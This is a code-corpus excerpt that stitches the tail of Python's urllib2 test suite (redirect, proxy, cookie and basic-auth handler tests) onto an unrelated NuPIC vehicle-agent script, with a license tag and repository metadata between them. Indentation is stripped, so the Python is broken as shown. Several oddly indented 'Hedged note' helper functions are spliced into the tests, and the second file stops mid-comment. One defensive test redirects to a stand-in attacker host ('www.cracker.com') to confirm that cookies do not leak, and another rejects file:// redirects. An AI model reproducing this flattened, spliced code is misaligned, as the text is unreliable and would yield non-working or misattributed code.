# file://ftp.example.com/blah.txt (an ftp URL)
for url, ftp in [
("file://ftp.example.com//foo.txt", False),
("file://ftp.example.com///foo.txt", False),
# XXXX bug: fails with OSError, should be URLError
("file://ftp.example.com/foo.txt", False),
("file://somehost//foo/something.txt", False),
("file://localhost//foo/something.txt", False),
]:
req = Request(url)
try:
h.file_open(req)
# XXXX remove OSError when bug fixed
except (urllib.error.URLError, OSError):
self.assertFalse(ftp)
else:
self.assertIs(o.req, req)
self.assertEqual(req.type, "ftp")
self.assertEqual(req.type == "ftp", ftp)
def test_http(self):
h = urllib.request.AbstractHTTPHandler()
o = h.parent = MockOpener()
url = "http://example.com/"
for method, data in [("GET", None), ("POST", b"blah")]:
req = Request(url, data, {"Foo": "bar"})
req.timeout = None
req.add_unredirected_header("Spam", "eggs")
http = MockHTTPClass()
r = h.do_open(http, req)
# result attributes
r.read; r.readline # wrapped MockFile methods
r.info; r.geturl # addinfourl methods
r.code, r.msg == 200, "OK" # added from MockHTTPClass.getreply()
hdrs = r.info()
hdrs.get; hdrs.__contains__ # r.info() gives dict from .getreply()
self.assertEqual(r.geturl(), url)
self.assertEqual(http.host, "example.com")
self.assertEqual(http.level, 0)
self.assertEqual(http.method, method)
self.assertEqual(http.selector, "/")
self.assertEqual(http.req_headers,
[("Connection", "close"),
("Foo", "bar"), ("Spam", "eggs")])
self.assertEqual(http.data, data)
# check socket.error converted to URLError
http.raise_on_endheaders = True
self.assertRaises(urllib.error.URLError, h.do_open, http, req)
# Check for TypeError on POST data which is str.
req = Request("http://example.com/","badpost")
self.assertRaises(TypeError, h.do_request_, req)
# check adding of standard headers
o.addheaders = [("Spam", "eggs")]
for data in b"", None: # POST, GET
req = Request("http://example.com/", data)
r = MockResponse(200, "OK", {}, "")
newreq = h.do_request_(req)
if data is None: # GET
self.assertNotIn("Content-length", req.unredirected_hdrs)
self.assertNotIn("Content-type", req.unredirected_hdrs)
else: # POST
self.assertEqual(req.unredirected_hdrs["Content-length"], "0")
self.assertEqual(req.unredirected_hdrs["Content-type"],
"application/x-www-form-urlencoded")
# XXX the details of Host could be better tested
self.assertEqual(req.unredirected_hdrs["Host"], "example.com")
self.assertEqual(req.unredirected_hdrs["Spam"], "eggs")
# don't clobber existing headers
req.add_unredirected_header("Content-length", "foo")
req.add_unredirected_header("Content-type", "bar")
req.add_unredirected_header("Host", "baz")
req.add_unredirected_header("Spam", "foo")
newreq = h.do_request_(req)
self.assertEqual(req.unredirected_hdrs["Content-length"], "foo")
self.assertEqual(req.unredirected_hdrs["Content-type"], "bar")
self.assertEqual(req.unredirected_hdrs["Host"], "baz")
self.assertEqual(req.unredirected_hdrs["Spam"], "foo")
# Check iterable body support
def iterable_body():
yield b"one"
yield b"two"
yield b"three"
for headers in {}, {"Content-Length": 11}:
req = Request("http://example.com/", iterable_body(), headers)
if not headers:
# Having an iterable body without a Content-Length should
# raise an exception
self.assertRaises(ValueError, h.do_request_, req)
else:
newreq = h.do_request_(req)
# A file object.
# Test only Content-Length attribute of request.
file_obj = io.BytesIO()
file_obj.write(b"Something\nSomething\nSomething\n")
for headers in {}, {"Content-Length": 30}:
req = Request("http://example.com/", file_obj, headers)
if not headers:
# Having an iterable body without a Content-Length should
# raise an exception
self.assertRaises(ValueError, h.do_request_, req)
else:
newreq = h.do_request_(req)
self.assertEqual(int(newreq.get_header('Content-length')),30)
file_obj.close()
# array.array Iterable - Content Length is calculated
iterable_array = array.array("I",[1,2,3,4])
for headers in {}, {"Content-Length": 16}:
req = Request("http://example.com/", iterable_array, headers)
newreq = h.do_request_(req)
self.assertEqual(int(newreq.get_header('Content-length')),16)
def test_http_doubleslash(self):
        # Checks that the presence of an unnecessary double slash in a url does not
# break anything. Previously, a double slash directly after the host
# could cause incorrect parsing.
h = urllib.request.AbstractHTTPHandler()
h.parent = MockOpener()
data = b""
ds_urls = [
"http://example.com/foo/bar/baz.html",
"http://example.com//foo/bar/baz.html",
"http://example.com/foo//bar/baz.html",
"http://example.com/foo/bar//baz.html"
]
for ds_url in ds_urls:
ds_req = Request(ds_url, data)
# Check whether host is determined correctly if there is no proxy
np_ds_req = h.do_request_(ds_req)
self.assertEqual(np_ds_req.unredirected_hdrs["Host"],"example.com")
# Check whether host is determined correctly if there is a proxy
ds_req.set_proxy("someproxy:3128",None)
p_ds_req = h.do_request_(ds_req)
self.assertEqual(p_ds_req.unredirected_hdrs["Host"],"example.com")
def test_fixpath_in_weirdurls(self):
        # Issue4493: urllib2 should supply '/' for urls where the path does
        # not start with '/'
h = urllib.request.AbstractHTTPHandler()
h.parent = MockOpener()
weird_url = 'http://www.python.org?getspam'
req = Request(weird_url)
newreq = h.do_request_(req)
self.assertEqual(newreq.host,'www.python.org')
self.assertEqual(newreq.selector,'/?getspam')
url_without_path = 'http://www.python.org'
req = Request(url_without_path)
newreq = h.do_request_(req)
self.assertEqual(newreq.host,'www.python.org')
self.assertEqual(newreq.selector,'')
def test_errors(self):
h = urllib.request.HTTPErrorProcessor()
o = h.parent = MockOpener()
url = "http://example.com/"
req = Request(url)
# all 2xx are passed through
r = MockResponse(200, "OK", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
r = MockResponse(202, "Accepted", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
r = MockResponse(206, "Partial content", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
# anything else calls o.error (and MockOpener returns None, here)
r = MockResponse(502, "Bad gateway", {}, "", url)
self.assertIsNone(h.http_response(req, r))
self.assertEqual(o.proto, "http") # o.error called
self.assertEqual(o.args, (req, r, 502, "Bad gateway", {}))
def test_cookies(self):
cj = MockCookieJar()
h = urllib.request.HTTPCookieProcessor(cj)
h.parent = MockOpener()
req = Request("http://example.com/")
r = MockResponse(200, "OK", {}, "")
newreq = h.http_request(req)
self.assertIs(cj.ach_req, req)
self.assertIs(cj.ach_req, newreq)
self.assertEqual(req.origin_req_host, "example.com")
self.assertFalse(req.unverifiable)
newr = h.http_response(req, r)
self.assertIs(cj.ec_req, req)
self.assertIs(cj.ec_r, r)
self.assertIs(r, newr)
def test_redirect(self):
from_url = "http://example.com/a.html"
to_url = "http://example.com/b.html"
h = urllib.request.HTTPRedirectHandler()
o = h.parent = MockOpener()
# ordinary redirect behaviour
for code in 301, 302, 303, 307:
for data in None, "blah\nblah\n":
method = getattr(h, "http_error_%s" % code)
req = Request(from_url, data)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
req.add_header("Nonsense", "viking=withhold")
if data is not None:
req.add_header("Content-Length", str(len(data)))
req.add_unredirected_header("Spam", "spam")
try:
method(req, MockFile(), code, "Blah",
MockHeaders({"location": to_url}))
except urllib.error.HTTPError:
# 307 in response to POST requires user OK
self.assertTrue(code == 307 and data is not None)
self.assertEqual(o.req.get_full_url(), to_url)
try:
self.assertEqual(o.req.get_method(), "GET")
except AttributeError:
self.assertFalse(o.req.data)
# now it's a GET, there should not be headers regarding content
# (possibly dragged from before being a POST)
headers = [x.lower() for x in o.req.headers]
self.assertNotIn("content-length", headers)
self.assertNotIn("content-type", headers)
self.assertEqual(o.req.headers["Nonsense"],
"viking=withhold")
self.assertNotIn("Spam", o.req.headers)
self.assertNotIn("Spam", o.req.unredirected_hdrs)
# loop detection
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
def redirect(h, req, url=to_url):
h.http_error_302(req, MockFile(), 302, "Blah",
MockHeaders({"location": url}))
# Note that the *original* request shares the same record of
# redirections with the sub-requests caused by the redirections.
# detect infinite loop redirect of a URL to itself
req = Request(from_url, origin_req_host="example.com")
count = 0
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
try:
while 1:
redirect(h, req, "http://example.com/")
count = count + 1
except urllib.error.HTTPError:
# don't stop until max_repeats, because cookies may introduce state
self.assertEqual(count, urllib.request.HTTPRedirectHandler.max_repeats)
# detect endless non-repeating chain of redirects
req = Request(from_url, origin_req_host="example.com")
count = 0
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
try:
while 1:
redirect(h, req, "http://example.com/%d" % count)
count = count + 1
except urllib.error.HTTPError:
self.assertEqual(count,
urllib.request.HTTPRedirectHandler.max_redirections)
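# Hedged note on the two limits exercised above (illustrative, not part of
# the original tests): redirects to the *same* URL are tolerated up to
# max_repeats, since cookies may legitimately change server state between
# visits, while any chain, repeating or not, is cut off at max_redirections.
def _demo_redirect_limits():
    h = urllib.request.HTTPRedirectHandler()
    assert h.max_repeats <= h.max_redirections  # repeats is the tighter bound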
def test_invalid_redirect(self):
from_url = "http://example.com/a.html"
valid_schemes = ['http','https','ftp']
invalid_schemes = ['file','imap','ldap']
schemeless_url = "example.com/b.html"
h = urllib.request.HTTPRedirectHandler()
o = h.parent = MockOpener()
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
for scheme in invalid_schemes:
invalid_url = scheme + '://' + schemeless_url
self.assertRaises(urllib.error.HTTPError, h.http_error_302,
req, MockFile(), 302, "Security Loophole",
MockHeaders({"location": invalid_url}))
for scheme in valid_schemes:
valid_url = scheme + '://' + schemeless_url
h.http_error_302(req, MockFile(), 302, "That's fine",
MockHeaders({"location": valid_url}))
self.assertEqual(o.req.get_full_url(), valid_url)
def test_relative_redirect(self):
from_url = "http://example.com/a.html"
relative_url = "/b.html"
h = urllib.request.HTTPRedirectHandler()
o = h.parent = MockOpener()
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
valid_url = urllib.parse.urljoin(from_url,relative_url)
h.http_error_302(req, MockFile(), 302, "That's fine",
MockHeaders({"location": valid_url}))
self.assertEqual(o.req.get_full_url(), valid_url)
def test_cookie_redirect(self):
# cookies shouldn't leak into redirected requests
from http.cookiejar import CookieJar
from test.test_http_cookiejar import interact_netscape
cj = CookieJar()
interact_netscape(cj, "http://www.example.com/", "spam=eggs")
hh = MockHTTPHandler(302, "Location: http://www.cracker.com/\r\n\r\n")
hdeh = urllib.request.HTTPDefaultErrorHandler()
hrh = urllib.request.HTTPRedirectHandler()
cp = urllib.request.HTTPCookieProcessor(cj)
o = build_test_opener(hh, hdeh, hrh, cp)
o.open("http://www.example.com/")
self.assertFalse(hh.req.has_header("Cookie"))
def test_redirect_fragment(self):
redirected_url = 'http://www.example.com/index.html#OK\r\n\r\n'
hh = MockHTTPHandler(302, 'Location: ' + redirected_url)
hdeh = urllib.request.HTTPDefaultErrorHandler()
hrh = urllib.request.HTTPRedirectHandler()
o = build_test_opener(hh, hdeh, hrh)
fp = o.open('http://www.example.com')
self.assertEqual(fp.geturl(), redirected_url.strip())
def test_proxy(self):
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(http="proxy.example.com:3128"))
o.add_handler(ph)
meth_spec = [
[("http_open", "return response")]
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://acme.example.com/")
self.assertEqual(req.host, "acme.example.com")
o.open(req)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual([(handlers[0], "http_open")],
[tup[0:2] for tup in o.calls])
def test_proxy_no_proxy(self):
os.environ['no_proxy'] = 'python.org'
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(http="proxy.example.com"))
o.add_handler(ph)
req = Request("http://www.perl.org/")
self.assertEqual(req.host, "www.perl.org")
o.open(req)
self.assertEqual(req.host, "proxy.example.com")
req = Request("http://www.python.org")
self.assertEqual(req.host, "www.python.org")
o.open(req)
self.assertEqual(req.host, "www.python.org")
del os.environ['no_proxy']
def test_proxy_no_proxy_all(self):
os.environ['no_proxy'] = '*'
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(http="proxy.example.com"))
o.add_handler(ph)
req = Request("http://www.python.org")
self.assertEqual(req.host, "www.python.org")
o.open(req)
self.assertEqual(req.host, "www.python.org")
del os.environ['no_proxy']
def test_proxy_https(self):
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(https="proxy.example.com:3128"))
o.add_handler(ph)
meth_spec = [
[("https_open", "return response")]
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("https://www.example.com/")
self.assertEqual(req.host, "www.example.com")
o.open(req)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual([(handlers[0], "https_open")],
[tup[0:2] for tup in o.calls])
def test_proxy_https_proxy_authorization(self):
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(https='proxy.example.com:3128'))
o.add_handler(ph)
https_handler = MockHTTPSHandler()
o.add_handler(https_handler)
req = Request("https://www.example.com/")
req.add_header("Proxy-Authorization","FooBar")
req.add_header("User-Agent","Grail")
self.assertEqual(req.host, "www.example.com")
self.assertIsNone(req._tunnel_host)
o.open(req)
# Verify Proxy-Authorization gets tunneled to request.
        # httpsconn req_headers do not have the Proxy-Authorization header but
        # the req will have it.
self.assertNotIn(("Proxy-Authorization","FooBar"),
https_handler.httpconn.req_headers)
self.assertIn(("User-Agent","Grail"),
https_handler.httpconn.req_headers)
self.assertIsNotNone(req._tunnel_host)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual(req.get_header("Proxy-authorization"),"FooBar")
# TODO: This should be only for OSX
@unittest.skipUnless(sys.platform == 'darwin', "only relevant for OSX")
def test_osx_proxy_bypass(self):
bypass = {
'exclude_simple': False,
'exceptions': ['foo.bar', '*.bar.com', '127.0.0.1', '10.10',
'10.0/16']
}
# Check hosts that should trigger the proxy bypass
for host in ('foo.bar', 'www.bar.com', '127.0.0.1', '10.10.0.1',
'10.0.0.1'):
self.assertTrue(_proxy_bypass_macosx_sysconf(host, bypass),
'expected bypass of %s to be True' % host)
# Check hosts that should not trigger the proxy bypass
for host in ('abc.foo.bar', 'bar.com', '127.0.0.2', '10.11.0.1', 'test'):
self.assertFalse(_proxy_bypass_macosx_sysconf(host, bypass),
'expected bypass of %s to be False' % host)
# Check the exclude_simple flag
bypass = {'exclude_simple': True, 'exceptions': []}
self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
def test_basic_auth(self, quote_char='"'):
opener = OpenerDirector()
password_manager = MockPasswordManager()
auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
realm = "ACME Widget Store"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
(quote_char, realm, quote_char) )
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
self._test_basic_auth(opener, auth_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
def test_basic_auth_with_single_quoted_realm(self):
self.test_basic_auth(quote_char="'")
def test_basic_auth_with_unquoted_realm(self):
opener = OpenerDirector()
password_manager = MockPasswordManager()
auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
realm = "ACME Widget Store"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
with self.assertWarns(UserWarning):
self._test_basic_auth(opener, auth_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
def test_proxy_basic_auth(self):
opener = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(http="proxy.example.com:3128"))
opener.add_handler(ph)
password_manager = MockPasswordManager()
auth_handler = urllib.request.ProxyBasicAuthHandler(password_manager)
realm = "ACME Networks"
http_handler = MockHTTPHandler(
407, 'Proxy-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
self._test_basic_auth(opener, auth_handler, "Proxy-authorization",
realm, http_handler, password_manager,
"http://acme.example.com:3128/protected",
"proxy.example.com:3128",
)
def test_basic_and_digest_auth_handlers(self):
# HTTPDigestAuthHandler raised an exception if it couldn't handle a 40*
# response (http://python.org/sf/1479302), where it should instead
# return None to allow another handler (especially
# HTTPBasicAuthHandler) to handle the response.
# Also (http://python.org/sf/14797027, RFC 2617 section 1.2), we must
# try digest first (since it's the strongest auth scheme), so we record
# order of calls here to check digest comes first:
class RecordingOpenerDirector(OpenerDirector):
def __init__(self):
OpenerDirector.__init__(self)
self.recorded = []
def record(self, info):
self.recorded.append(info)
class TestDigestAuthHandler(urllib.request.HTTPDigestAuthHandler):
def http_error_401(self, *args, **kwds):
self.parent.record("digest")
urllib.request.HTTPDigestAuthHandler.http_error_401(self,
*args, **kwds)
class TestBasicAuthHandler(urllib.request.HTTPBasicAuthHandler):
def http_error_401(self, *args, **kwds):
self.parent.record("basic")
urllib.request.HTTPBasicAuthHandler.http_error_401(self,
*args, **kwds)
opener = RecordingOpenerDirector()
password_manager = MockPasswordManager()
digest_handler = TestDigestAuthHandler(password_manager)
basic_handler = TestBasicAuthHandler(password_manager)
realm = "ACME Networks"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
opener.add_handler(basic_handler)
opener.add_handler(digest_handler)
opener.add_handler(http_handler)
# check basic auth isn't blocked by digest handler failing
self._test_basic_auth(opener, basic_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
# check digest was tried before basic (twice, because
# _test_basic_auth called .open() twice)
self.assertEqual(opener.recorded, ["digest", "basic"]*2)
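# Hedged sketch of why the ordering holds (illustrative, not part of the
# original tests): both handlers carry a handler_order, and the digest
# handler sets a lower (earlier) value than basic precisely so the stronger
# scheme gets the first chance at a 401 response.
def _demo_auth_handler_order():
    digest = urllib.request.HTTPDigestAuthHandler(MockPasswordManager())
    basic = urllib.request.HTTPBasicAuthHandler(MockPasswordManager())
    assert digest.handler_order < basic.handler_order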
def test_unsupported_auth_digest_handler(self):
opener = OpenerDirector()
# While using DigestAuthHandler
digest_auth_handler = urllib.request.HTTPDigestAuthHandler(None)
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Kerberos\r\n\r\n')
opener.add_handler(digest_auth_handler)
opener.add_handler(http_handler)
self.assertRaises(ValueError,opener.open,"http://www.example.com")
def test_unsupported_auth_basic_handler(self):
# While using BasicAuthHandler
opener = OpenerDirector()
basic_auth_handler = urllib.request.HTTPBasicAuthHandler(None)
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: NTLM\r\n\r\n')
opener.add_handler(basic_auth_handler)
opener.add_handler(http_handler)
self.assertRaises(ValueError,opener.open,"http://www.example.com")
def _test_basic_auth(self, opener, auth_handler, auth_header,
realm, http_handler, password_manager,
request_url, protected_url):
import base64
user, password = "wile", "coyote"
# .add_password() fed through to password manager
auth_handler.add_password(realm, request_url, user, password)
self.assertEqual(realm, password_manager.realm)
self.assertEqual(request_url, password_manager.url)
self.assertEqual(user, password_manager.user)
self.assertEqual(password, password_manager.password)
opener.open(request_url)
# should have asked the password manager for the username/password
self.assertEqual(password_manager.target_realm, realm)
self.assertEqual(password_manager.target_url, protected_url)
# expect one request without authorization, then one with
self.assertEqual(len(http_handler.requests), 2)
self.assertFalse(http_handler.requests[0].has_header(auth_header))
userpass = bytes('%s:%s' % (user, password), "ascii")
auth_hdr_value = ('Basic ' +
base64.encodebytes(userpass).strip().decode())
self.assertEqual(http_handler.requests[1].get_header(auth_header),
auth_hdr_value)
self.assertEqual(http_handler.requests[1].unredirected_hdrs[auth_header],
auth_hdr_value)
# if the password manager can't find a password, the handler won't
# handle the HTTP auth error
password_manager.user = password_manager.password = None
http_handler.reset()
opener.open(request_url)
self.assertEqual(len(http_handler.requests), 1)
self.assertFalse(http_handler.requests[0].has_header(auth_header))
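# Hedged illustration of the credential encoding verified above
# (illustrative, not part of the original tests): the Basic scheme is just
# "user:password" base64-encoded behind a "Basic " prefix.
def _demo_basic_auth_header():
    import base64
    token = base64.b64encode(b"wile:coyote").decode("ascii")
    assert "Basic " + token == "Basic d2lsZTpjb3lvdGU="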
class MiscTests(unittest.TestCase):
def opener_has_handler(self, opener, handler_class):
self.assertTrue(any(h.__class__ == handler_class
for h in opener.handlers))
def test_build_opener(self):
class MyHTTPHandler(urllib.request.HTTPHandler): pass
class FooHandler(urllib.request.BaseHandler):
def foo_open(self): pass
class BarHandler(urllib.request.BaseHandler):
def bar_open(self): pass
build_opener = urllib.request.build_opener
o = build_opener(FooHandler, BarHandler)
self.opener_has_handler(o, FooHandler)
self.opener_has_handler(o, BarHandler)
# can take a mix of classes and instances
o = build_opener(FooHandler, BarHandler())
self.opener_has_handler(o, FooHandler)
self.opener_has_handler(o, BarHandler)
# subclasses of default handlers override default handlers
o = build_opener(MyHTTPHandler)
self.opener_has_handler(o, MyHTTPHandler)
# a particular case of overriding: default handlers can be passed
# in explicitly
o = build_opener()
self.opener_has_handler(o, urllib.request.HTTPHandler)
o = build_opener(urllib.request.HTTPHandler)
self.opener_has_handler(o, urllib.request.HTTPHandler)
o = build_opener(urllib.request.HTTPHandler())
self.opener_has_handler(o, urllib.request.HTTPHandler)
# Issue2670: multiple handlers sharing the same base class
class MyOtherHTTPHandler(urllib.request.HTTPHandler): pass
o = build_opener(MyHTTPHandler, MyOtherHTTPHandler)
self.opener_has_handler(o, MyHTTPHandler)
self.opener_has_handler(o, MyOtherHTTPHandler)
def test_HTTPError_interface(self):
"""
Issue 13211 reveals that HTTPError didn't implement the URLError
interface even though HTTPError is a subclass of URLError.
"""
msg = 'something bad happened'
url = code = fp = None
hdrs = 'Content-Length: 42'
err = urllib.error.HTTPError(url, code, msg, hdrs, fp)
self.assertTrue(hasattr(err, 'reason'))
self.assertEqual(err.reason, 'something bad happened')
self.assertTrue(hasattr(err, 'hdrs'))
self.assertEqual(err.hdrs, 'Content-Length: 42')
expected_errmsg = 'HTTP Error %s: %s' % (err.code, err.msg)
self.assertEqual(str(err), expected_errmsg)
class RequestTests(unittest.TestCase):
def setUp(self):
self.get = Request("http://www.python.org/~jeremy/")
self.post = Request("http://www.python.org/~jeremy/",
"data",
headers={"X-Test": "test"})
def test_method(self):
self.assertEqual("POST", self.post.get_method())
self.assertEqual("GET", self.get.get_method())
def test_data(self):
self.assertFalse(self.get.data)
self.assertEqual("GET", self.get.get_method())
self.get.data = "spam"
self.assertTrue(self.get.data)
self.assertEqual("POST", self.get.get_method())
def test_get_full_url(self):
self.assertEqual("http://www.python.org/~jeremy/",
self.get.get_full_url())
def test_selector(self):
self.assertEqual("/~jeremy/", self.get.selector)
req = Request("http://www.python.org/")
self.assertEqual("/", req.selector)
def test_get_type(self):
self.assertEqual("http", self.get.type)
def test_get_host(self):
self.assertEqual("www.python.org", self.get.host)
def test_get_host_unquote(self):
req = Request("http://www.%70ython.org/")
self.assertEqual("www.python.org", req.host)
def test_proxy(self):
self.assertFalse(self.get.has_proxy())
self.get.set_proxy("www.perl.org", "http")
self.assertTrue(self.get.has_proxy())
self.assertEqual("www.python.org", self.get.origin_req_host)
self.assertEqual("www.perl.org", self.get.host)
def test_wrapped_url(self):
req = Request("<URL:http://www.python.org>")
self.assertEqual("www.python.org", req.host)
def test_url_fragment(self):
req = Request("http://www.python.org/?qs=query#fragment=true")
self.assertEqual("/?qs=query", req.selector)
req = Request("http://www.python.org/#fun=true")
self.assertEqual("/", req.selector)
# Issue 11703: geturl() omits fragment in the original URL.
url = 'http://docs.python.org/library/urllib2.html#OK'
req = Request(url)
self.assertEqual(req.get_full_url(), url)
def test_HTTPError_interface_call(self):
"""
Issue 15701 - HTTPError interface has info method available from URLError
"""
err = urllib.request.HTTPError(msg="something bad happened", url=None,
code=None, hdrs='Content-Length:42', fp=None)
self.assertTrue(hasattr(err, 'reason'))
assert hasattr(err, 'reason')
assert hasattr(err, 'info')
assert callable(err.info)
try:
err.info()
except AttributeError:
self.fail('err.info call failed.')
self.assertEqual(err.info(), "Content-Length:42")
def test_main(verbose=None):
from test import test_urllib2
support.run_doctest(test_urllib2, verbose)
support.run_doctest(urllib.request, verbose)
tests = (TrivialTests,
OpenerDirectorTests,
HandlerTests,
MiscTests,
RequestTests,
RequestHdrsTests)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main(verbose=True)
| agpl-3.0 |
ywcui1990/nupic.research | projects/vehicle-control/agent/run_sm.py | 6 | 7819 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from collections import defaultdict
import operator
import time
import numpy
from unity_client.server import Server
from nupic.encoders.coordinate import CoordinateEncoder
from nupic.encoders.scalar import ScalarEncoder
from nupic.algorithms.monitor_mixin.trace import CountsTrace
from sensorimotor.extended_temporal_memory import ApicalTiebreakPairMemory
from htmresearch.support.apical_tm_pair_monitor_mixin import (
ApicalTMPairMonitorMixin)
class MonitoredApicalTiebreakPairMemory(
ApicalTMPairMonitorMixin, ApicalTiebreakPairMemory): pass
SCALE = 5
RADIUS = 10
class Agent(object):
def __init__(self):
self.encoder = CoordinateEncoder(n=1024,
w=21)
self.motorEncoder = ScalarEncoder(21, -1, 1,
n=1024)
self.tm = MonitoredApicalTiebreakPairMemory(
columnDimensions=[2048],
basalInputDimensions=(999999,), # Dodge input checking.
cellsPerColumn=1,
initialPermanence=0.5,
connectedPermanence=0.6,
permanenceIncrement=0.1,
permanenceDecrement=0.02,
minThreshold=35,
activationThreshold=35,
maxNewSynapseCount=40)
self.plotter = Plotter(self.tm, showOverlaps=False, showOverlapsValues=False)
self.lastState = None
self.lastAction = None
self.prevMotorPattern = ()
def sync(self, outputData):
if not ("location" in outputData and
"steer" in outputData):
print "Warning: Missing data:", outputData
return
reset = outputData.get("reset") or False
if reset:
print "Reset."
self.tm.reset()
location = outputData["location"]
steer = outputData["steer"]
x = int(location["x"] * SCALE)
z = int(location["z"] * SCALE)
coordinate = numpy.array([x, z])
encoding = self.encoder.encode((coordinate, RADIUS))
motorEncoding = self.motorEncoder.encode(steer)
sensorPattern = set(encoding.nonzero()[0])
motorPattern = set(motorEncoding.nonzero()[0])
self.tm.compute(sensorPattern,
activeCellsExternalBasal=motorPattern,
reinforceCandidatesExternalBasal=self.prevMotorPattern,
growthCandidatesExternalBasal=self.prevMotorPattern)
print self.tm.mmPrettyPrintMetrics(self.tm.mmGetDefaultMetrics())
self.plotter.update(encoding, reset)
if reset:
self.plotter.render()
self.lastState = encoding
self.lastAction = steer
self.prevMotorPattern = motorPattern
class Plotter(object):
def __init__(self, tm, showOverlaps=False, showOverlapsValues=False):
self.tm = tm
self.showOverlaps = showOverlaps
self.showOverlapsValues = showOverlapsValues
self.encodings = []
self.resets = []
self.numSegmentsPerCell = []
self.numSynapsesPerSegment = []
import matplotlib.pyplot as plt
self.plt = plt
import matplotlib.cm as cm
self.cm = cm
from pylab import rcParams
if self.showOverlaps and self.showOverlapsValues:
rcParams.update({'figure.figsize': (20, 20)})
else:
rcParams.update({'figure.figsize': (6, 12)})
rcParams.update({'figure.autolayout': True})
rcParams.update({'figure.facecolor': 'white'})
rcParams.update({'ytick.labelsize': 8})
def update(self, encoding, reset):
self.encodings.append(encoding)
self.resets.append(reset)
# TODO: Deal with empty segments / unconnected synapses
numSegmentsPerCell = [len(segments) for segments in
self.tm.connections._segmentsForCell.values()]
self.numSegmentsPerCell.append(numpy.array(numSegmentsPerCell))
numSynapsesPerSegment = [len(synapses) for synapses in
self.tm.connections._synapsesForSegment.values()]
self.numSynapsesPerSegment.append(numpy.array(numSynapsesPerSegment))
def render(self):
timestamp = int(time.time())
self.plt.figure(1)
self.plt.clf()
self._renderMetrics(timestamp)
if self.showOverlaps:
self.plt.figure(2)
self.plt.clf()
self._renderOverlaps(timestamp)
def _renderMetrics(self, timestamp):
traces = self.tm.mmGetDefaultTraces()
traces = [trace for trace in traces if type(trace) is CountsTrace]
t = len(traces)
n = t + 2
for i in xrange(t):
trace = traces[i]
self.plt.subplot(n, 1, i+1)
self._plot(trace.data, trace.title)
self.plt.subplot(n, 1, t+1)
self._plotDistributions(self.numSegmentsPerCell, "# segments per cell")
self.plt.subplot(n, 1, t+2)
self._plotDistributions(self.numSynapsesPerSegment, "# synapses per segment")
self.plt.draw()
self.plt.savefig("sm-{0}_A.png".format(timestamp))
def _renderOverlaps(self, timestamp):
self.plt.subplot(1, 1, 1)
overlaps = self._computeOverlaps()
self._imshow(overlaps, "Overlaps", aspect=None)
for i in self._computeResetIndices():
self.plt.axvline(i, color='black', alpha=0.5)
self.plt.axhline(i, color='black', alpha=0.5)
if self.showOverlapsValues:
for i in range(len(overlaps)):
for j in range(len(overlaps[i])):
overlap = "%.1f" % overlaps[i][j]
self.plt.annotate(overlap, xy=(i, j), fontsize=6, color='red', verticalalignment='center', horizontalalignment='center')
self.plt.draw()
self.plt.savefig("sm-{0}_B.png".format(timestamp))
def _computeOverlaps(self):
overlaps = []
encodings = self.encodings
for i in range(len(encodings)):
row = []
for j in range(len(encodings)):
n = max(encodings[i].sum(), encodings[j].sum())
overlap = (encodings[i] & encodings[j]).sum() / float(n)
row.append(overlap)
overlaps.append(row)
return overlaps
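# Hedged note (illustrative, not part of the original file): each matrix
# entry above is the symmetric overlap score |a & b| / max(|a|, |b|), so
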